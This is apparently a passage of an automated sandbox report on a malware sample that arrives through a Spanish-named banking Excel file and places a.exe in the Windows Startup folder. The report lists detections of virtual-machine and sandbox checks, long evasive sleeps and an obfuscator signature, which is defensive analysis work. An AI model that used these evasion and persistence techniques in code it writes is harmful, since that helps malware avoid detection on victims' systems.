Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls Stream path 'Workbook' entropy: 7.96834669995 (max. 8.0)

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Yara detected Beds Obfuscator
Source: Yara match File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE
Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10800000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799657
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799266
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10799141
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798860
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798594
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798438
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798297
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10798079
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797704
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10797204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796313
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10796110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795813
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795360
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10795063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794610
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794485
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794344
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10794063
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10793954
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10789125
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10789016
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788907
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788641
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788500
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788391
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 10788250
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1905
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 833
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Window / User API: threadDelayed 3271
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Window / User API: threadDelayed 5739
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676 Thread sleep count: 1905 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736 Thread sleep count: 833 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6692 Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3040 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6724 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 4928 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 584 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10800000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799657s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799266s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10799141s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798438s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798297s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10798079s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797704s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10797204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796313s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10796110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795813s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795204s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10795063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794344s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10794063s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10793954s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99859s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98875s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98765s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98515s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98281s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -98015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97687s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97578s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97469s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97359s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -97015s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96906s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96797s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96640s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96531s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96422s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96312s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96203s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -96094s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95953s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95703s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95594s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95484s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -95375s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10789125s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10789016s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788907s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788750s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788641s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788500s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788391s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 1500 Thread sleep time: -10788250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5676 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 6884 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe TID: 5464 Thread sleep time: -922337203685477s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM WIN32_PROCESSOR
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: powershell.exe, 0000000A.00000002.823826919.0000000005038000.00000004.00000001.sdmp Binary or memory string: e:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: a.exe, 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp Binary or memory string: EnableAntiVMware
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: a.exe, 00000001.00000002.715744246.00000000072C0000.00000002.00000001.sdmp, a.exe, 0000000B.00000002.787547923.0000000006A00000.00000002.00000001.sdmp, a.exe, 00000011.00000002.873462654.0000000006F20000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
